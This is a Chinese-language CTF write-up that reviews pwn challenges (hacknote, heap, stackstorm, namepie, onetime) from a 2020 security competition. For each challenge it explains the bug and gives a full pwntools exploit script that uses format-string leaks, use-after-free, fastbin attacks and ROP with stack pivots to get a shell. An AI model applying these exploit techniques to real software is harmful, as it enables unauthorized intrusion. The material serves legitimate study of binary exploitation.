2020信息安全铁人三项 pwn复盘
2024-09-08 18:27:47
第一赛区
hacknote
程序存在格式化字符串漏洞和uaf,不多说了,很简单。
1 from pwn import *
2
3 p = process('./hacknote')
4 elf = ELF('./hacknote')
5 libc = ELF('./libc.so.6')
6 context.log_level = 'debug'
7 #by bhxdn
8
9 def duan():
10 gdb.attach(p)
11 pause()
12
13 def add(size,content):
14 p.sendlineafter('choice :','1')
15 p.sendlineafter('size :',str(size))
16 p.sendafter('Content :',content)
17
18 def delete(index):
19 p.sendlineafter('choice :','2')
20 p.sendlineafter('Index :',str(index))
21
22 def show(index):
23 p.sendlineafter('choice :','3')
24 p.sendlineafter('Index :',str(index))
25
26 #leak libc_base
27 p.sendafter('name!\n','%13$p')
28 p.recvuntil('hello ,')
29 libc_base = int(p.recv(14),16)-240-libc.symbols['__libc_start_main']
30 print 'libc_base-->' + hex(libc_base)
31 shell = libc_base + 0x45226
32
33 add(0x20,'aaaaaaaa')
34 add(0x20,'bbbbbbbb')
35 delete(0)
36 delete(1)
37 add(0x10,p64(shell))
38 show(0)
39 p.interactive()
heap
同样是存在格式化字符串漏洞和uaf漏洞。
说一下格式化字符串漏洞泄露libc吧。
这里我直接看偏移为25的值。然后pwndbg看栈的情况,我直接stack 300看栈情况。然后放到文本中去找。
25偏移下面那个箭头,所以__libc_start_main+240就是偏移19。所以就%19$p就可以leak libc版本和地址了。
程序存在uaf漏洞,fastbins attack来攻击__malloc__hook,这里还需要利用realloc来调整一下栈帧来让one_gadget生效。
1 from pwn import *
2
3 p = process('./heap')
4 elf = ELF('./heap')
5 libc = ELF('./libc.so.6')
6 context.log_level = 'debug'
7 #by bhxdn
8
9 def duan():
10 gdb.attach(p)
11 pause()
12
13 def add(size):
14 p.sendlineafter('choice: ','1')
15 p.sendlineafter('item: ',str(size))
16
17 def delete(index):
18 p.sendlineafter('choice: ','4')
19 p.sendlineafter('item: ',str(index))
20
21 def edit(index,content):
22 p.sendlineafter('choice: ','3')
23 p.sendlineafter('item: ',str(index))
24 p.sendafter('data: ',content)
25
26 def show(index):
27 p.sendlineafter('choice: ','2')
28 p.sendlineafter('item: ',str(index))
29
30
31 #leak libc_base
32 p.sendafter('name: ','%19$p')
33 p.recvuntil('Hello, ')
34 libc_base = int(p.recv(14),16)-240-libc.symbols['__libc_start_main']
35 print 'pianyi-->' + hex(libc.symbols['__libc_start_main'])
36 print 'libc_base-->' + hex(libc_base)
37 shell = libc_base + 0x4527a
38
39 add(0x20) #0
40 add(0x60) #1
41 delete(1)
42 edit(1,p64(libc_base+libc.symbols['__malloc_hook']-0x23))
43 add(0x60) #1 2
44 add(0x60) #attack
45 edit(3,'a'*(0x13-8)+p64(shell)+p64(libc_base+libc.symbols['realloc']+0xc))
46 add(0x60)
47 p.interactive()
第二赛区
stackstorm
可以往堆写入两次数据(但似乎并没有什么用),可以栈溢出,但是只能溢出0x10字节。
利用第一次溢出泄露栈地址,然后第二次在栈上布置rop,利用栈转移迁移到我们布置的rop链上,leak了libc地址,然后返回到main函数,直接将返回地址覆盖成one_gadget就可以了。
1 from pwn import *
2
3 p = process('./stackstorm')
4 elf = ELF('./stackstorm')
5 libc = ELF('./libc.so.6')
6 context.log_level = 'debug'
7
8 pop_rdi = 0x00400903
9 leave_ret = 0x04007C1
10 buf = elf.bss()+0x100
11 main = 0x04007C3
12
13 p.sendafter('data1:\n','bhxdn')
14 payload = 'a'*(0x70-1)+'b'
15 p.sendafter('data2:\n',payload)
16 p.recvuntil('b')
17 stack_addr = u64(p.recv(6).ljust(8,'\x00'))
18 print 'stack_addr-->' + hex(stack_addr)
19
20 p.sendafter('data1:\n','bhxdn')
21 payload = 'aaaaaaaa' + p64(pop_rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(main)+p64(0)*9+p64(stack_addr-0x20-0x70)+p64(leave_ret)
22 p.sendafter('data2:\n',payload)
23 p.recv(12)
24 libc_base = u64(p.recv(6).ljust(8,'\x00'))-libc.symbols['puts']
25 print 'libc_base-->'+hex(libc_base)
26 shell = libc_base+0x4527a
27
28 payload = 'a'*0x70+'bbbbbbbb'+p64(shell)
29 p.send('bhxdn')
30 p.sendafter('data2:\n',payload)
31 p.interactive()
第三赛区
待更新
第四赛区
namepie
程序本身有system("/bin/sh"),两个输入,可以利用第一个输入leak canary。
图片可以看到rbp下面是程序本身的地址。开启pie 的程序,后三位是不会变的,所以只覆盖最后一个字节,覆盖成shell的字节,就拿到shell了。
exp:
1 from pwn import *
2
3 elf = ELF('./namepie')
4 context.log_level = 'debug'
5
6 shell = 0x000A71
7
8 p = process('./namepie')
9 p.recvuntil('Name:\n')
10 p.send('a'*0x28+'b')
11 p.recvuntil('b')
12 canary = u64(p.recv(7).rjust(8,'\x00'))
13 print 'canary-->' + hex(canary)
14 p.recv()
15 p.send('a'*0x28+p64(canary)+'bbbbbbbb'+'\x71')
16 p.sendline('ls')
17 p.recvuntil('namepie')
18 p.interactive()
onetime
是一道菜单堆题。调试的时候发现bss段上有7f。
存在uaf,先malloc一个chunk,再free掉,修改fd为bss段上的地址。然后再申请两次申请回来。这时候就可以控制bss上的数据,并且有一个可以读写的指针。
将指针指向malloc_got,泄露libc地址,然后修改malloc_got为one_gadget的地址,再执行malloc就拿到shell了。
1 from pwn import *
2
3 p = process('./pwn')
4 elf = ELF('./pwn')
5 libc = ELF('./libc.so.6')
6 context.log_level = 'debug'
7
8 def duan():
9 gdb.attach(p)
10 pause()
11
12 def add():
13 p.sendlineafter('choice >>\n','1')
14
15 def edit(content):
16 p.sendlineafter('choice >>\n','2')
17 p.sendafter('content:',content)
18
19 def show():
20 p.sendlineafter('choice >>\n','3')
21
22 def delete():
23 p.sendlineafter('choice >>\n','4')
24
25 def gift(content):
26 p.sendlineafter('choice >>\n','5')
27 p.sendafter('name:',content)
28
29 attack_addr = 0x0006020BC-0x2f
30 #x/32gx 0x0006020BC-0x24
31 add()
32 delete()
33 edit(p64(attack_addr))
34 add()
35 gift('a'*11+p64(elf.got['malloc'])+p32(100)+p32(100)+p32(100)+p32(100))
36
37 show()
38 libc_base = u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00')) - libc.symbols['malloc']
39 print 'libc_base-->' + hex(libc_base)
40 shell = libc_base + 0x45226
41
42
43 edit(p64(shell))
44 add()
45 p.interactive()
最新文章
- HttpClient 版本变化 转载
- Python初学的易犯错误
- C语言的函数
- Java 7 中 NIO.2 的使用——第一节 Path 类的使用
- A. Puzzles CodeForces Round #196 (Div.2)
- Flex随笔
- WPF 自定义滚动条样式
- navicat:cannot create oci environment
- feel倍儿爽
- 分享基于分布式Http长连接框架--代码模型
- 自动化双向数据绑定AngularJs---入门
- CSS你所不知的伪元素的用法
- css3多個佈局
- [POI2012]Odległość
- mysql事件调用存储过程总结
- Apache Flink 漫谈系列 - JOIN 算子
- spring开启事务时启动报错SAXParseException
- codeforces水题100道 第十题 Codeforces Round #277 (Div. 2) A. Calculating Function (math)
- vue-cli 项目构建性能分析工具
- Vuex以及axios 看这个